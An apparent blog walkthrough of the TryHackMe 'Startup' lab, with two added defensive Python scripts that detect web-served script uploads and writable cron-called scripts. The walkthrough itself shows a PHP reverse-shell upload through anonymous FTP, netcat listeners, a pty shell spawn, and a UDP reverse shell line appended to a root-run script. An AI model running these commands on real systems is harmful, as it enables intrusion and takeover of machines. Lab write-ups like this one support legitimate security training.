Link: https://tryhackme.com/room/startup
Enumeration
#1 “What is the secret spicy soup recipe?”
First, we use:
nmap -sC -sV 10.10.195.79
to find the open ports on the machine and the service versions behind them.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-79.png?w=853)
Port 21 is open, so we connect to the server over FTP.
ftp 10.10.195.79
Let’s try anonymous login with:
Name: anonymous
Password: anonymous
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-81.png?w=631)
There is a folder named “ftp”, and we can upload php-reverse-shell.php to it (after changing the IP to our own).
Using dirsearch, we found a folder named “files”.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-83.png?w=580)
Inside it we found the location of our uploaded shell.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-85.png?w=472)
Stand up a netcat listener on port 1234.
nc -lvnp 1234
Then we browse to http://10.10.195.79/files/ftp/shell.php
to trigger the reverse shell.
In the shell we found a file named “recipe.txt”, which contains the first flag.
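The foothold above works because the anonymous FTP directory is also published by the web server under /files/ftp/, so an uploaded .php file is executed as soon as it is requested. The following is an added example, not code from the original walkthrough: a defender-side sweep that lists files with server-side script extensions in the drop directory and scans access-log lines for requests that reach a script under that URL prefix. The directory tree and the log lines are constructed for the demo; only the /files/ftp/ prefix comes from the room.

```python
"""Detect server-side script uploads in a web-served FTP drop directory.

Added example; this is not code from the original walkthrough. The checks
assume an Apache/nginx combined access-log format and a drop directory on
local disk. The directory tree and the log lines are constructed.
"""
import os
import re
import tempfile

# Extensions the web server would hand to an interpreter rather than serve as data.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar", ".cgi", ".pl"}

# Combined log format (Apache/nginx): client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def uploaded_scripts(drop_dir):
    """Return every file under drop_dir whose extension marks it as executable content."""
    hits = []
    for base, _, names in os.walk(drop_dir):
        for name in names:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                hits.append(os.path.join(base, name))
    return sorted(hits)


def executed_uploads(log_lines, url_prefix="/files/ftp/"):
    """Return (client_ip, timestamp, path, status) for requests to a script under url_prefix."""
    events = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the sweep
        path = m["path"].split("?", 1)[0]  # drop any query string before checking the extension
        if path.startswith(url_prefix) and os.path.splitext(path)[1].lower() in SCRIPT_EXTS:
            events.append((m["ip"], m["ts"], path, m["status"]))
    return events


def demo_upload_check():
    """Build a constructed drop directory and access log, run both checks, return the results."""
    drop_dir = tempfile.mkdtemp(prefix="ftp_drop_")
    for name, body in (("shell.php", "<?php /* constructed placeholder, does nothing */ ?>\n"),
                       ("notes.txt", "nothing to see here\n")):
        with open(os.path.join(drop_dir, name), "w") as fh:
            fh.write(body)
    # Constructed access-log lines; 192.0.2.0/24 is the documentation address range.
    log_lines = [
        '192.0.2.10 - - [10/Mar/2021:12:00:01 +0000] "GET /files/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
        '192.0.2.10 - - [10/Mar/2021:12:00:05 +0000] "GET /files/ftp/shell.php HTTP/1.1" 200 0 "-" "curl/7.68.0"',
        '192.0.2.11 - - [10/Mar/2021:12:00:09 +0000] "GET /files/ftp/notes.txt HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
        'garbage line that does not parse',
    ]
    return uploaded_scripts(drop_dir), executed_uploads(log_lines)


if __name__ == "__main__":
    scripts, events = demo_upload_check()
    for path in scripts:
        print("executable upload on disk:", path)
    for ip, ts, path, status in events:
        print(f"{ts} {ip} requested {path} (HTTP {status})")
```

On a real host, point uploaded_scripts at the FTP root and feed executed_uploads the web server's access log; a single hit for a script under the upload prefix is already worth an alert. The fix is to keep the anonymous upload directory out of the document root, or to disable script execution for that location in the web server configuration.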
Foothold
#2 “What are the contents of user.txt?“
There is a folder /home/lennie, but we cannot access it.
We found a file named “suspicious.pcapng” in /incidents.
We can host an HTTP server with Python from that directory:
python3 -m http.server
Then we browse to http://10.10.195.79:8000/ and download the file.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-87.png?w=401)
Open it in Wireshark, follow the TCP stream, and we find a password.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-88.png?w=636)
Use:
python3 -c 'import pty; pty.spawn("/bin/sh")'
to spawn a TTY shell.
Then use:
su lennie
with that password, and we switch to lennie.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-89.png?w=427)
There we can find the second flag.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-90.png?w=296)
Privilege Escalation
#3 “What are the contents of root.txt?“
There is a folder named “scripts”.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-91.png?w=461)
Reading the file “planner.sh”, we can see that lennie will execute the file /etc/print.sh.
Go to /etc and check the file permissions of print.sh: lennie is the owner.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-92.png?w=505)
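The misconfiguration here is a scheduled script that calls another script which an unprivileged user owns and can edit. As an added example (not code from the original walkthrough), the following audit walks crontab text, follows absolute paths referenced inside each script one level further (the planner.sh → print.sh pattern), and reports every file that is not owned by the trusted uid or is group/world writable. The crontab lines and the directory tree in the demo are constructed; on a real host you would feed it /etc/crontab and the files under /etc/cron.d with trusted_uid=0.

```python
"""Audit cron-driven scripts for files that non-root users can modify.

Added example, not code from the original walkthrough. Assumptions: the
crontab text is in the usual five-field (or /etc/crontab six-field) layout,
scripts are plain text, and the trusted owner is root (uid 0) unless the
caller says otherwise. The demo tree and crontab lines are constructed.
"""
import os
import re
import stat
import tempfile

# Absolute paths not preceded by path-like characters (so "a/b" is not split into "/b").
PATH_RE = re.compile(r"(?<![\w.-])(/[\w./-]+)")


def extract_paths(text):
    """Absolute paths mentioned in crontab or shell-script text, with comments removed."""
    found = set()
    for line in text.splitlines():
        found.update(PATH_RE.findall(line.split("#", 1)[0]))
    return found


def modifiable_by_others(path, trusted_uid=0):
    """True if an account other than trusted_uid could change the file's contents."""
    st = os.stat(path)
    return st.st_uid != trusted_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(crontab_text, trusted_uid=0, max_depth=2):
    """Map each risky executable path to its octal mode, following nested scripts."""
    findings, seen = {}, set()
    frontier = [(p, 0) for p in extract_paths(crontab_text)]
    while frontier:
        path, depth = frontier.pop()
        if path in seen or not os.path.isfile(path):
            continue  # directories, missing files and PATH-style entries are skipped
        seen.add(path)
        if modifiable_by_others(path, trusted_uid):
            findings[path] = oct(os.stat(path).st_mode & 0o777)
        if depth >= max_depth:
            continue
        try:
            with open(path, "rb") as fh:
                head = fh.read(65536)
        except OSError:
            continue
        if b"\0" in head:
            continue  # binary such as /bin/bash: nothing to follow
        for child in extract_paths(head.decode("utf-8", "replace")):
            frontier.append((child, depth + 1))
    return findings


def demo_cron_audit():
    """Build a constructed tree mirroring the room and audit it.

    Returns (findings, path_expected_flagged, path_expected_clean). The demo
    files are owned by the current user, so that uid is treated as trusted;
    the finding therefore comes from the mode bits rather than the owner.
    """
    root = tempfile.mkdtemp(prefix="cron_audit_")
    planner = os.path.join(root, "planner.sh")
    printer = os.path.join(root, "print.sh")
    with open(planner, "w") as fh:
        fh.write("#!/bin/bash\n" + printer + "\n")  # scheduled script calls the second one
    with open(printer, "w") as fh:
        fh.write("#!/bin/bash\necho 'print'\n")
    os.chmod(planner, 0o755)  # only the owner may write: clean
    os.chmod(printer, 0o777)  # world writable: the finding
    crontab = "# constructed crontab\n* * * * * root " + planner + "\n"
    return audit_cron(crontab, trusted_uid=os.getuid()), printer, planner


if __name__ == "__main__":
    findings, _, _ = demo_cron_audit()
    for path, mode in sorted(findings.items()):
        print(f"{path}: mode {mode}, modifiable by non-trusted users")
```

Anything the audit reports should be root-owned with mode 0755 or tighter; the same check is worth extending to the directories that contain those scripts, since a writable directory lets a user replace the file outright.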
Then we append a reverse shell to this file:
#!/bin/bash
sh -i >& /dev/udp/10.6.63.158/4242 0>&1
Stand up a netcat UDP listener on port 4242.
nc -lvup 4242
Then run print.sh:
./print.sh
![](https://niekdang.wordpress.com/wp-content/uploads/2021/03/image-94.png?w=439)
And we found the root flag.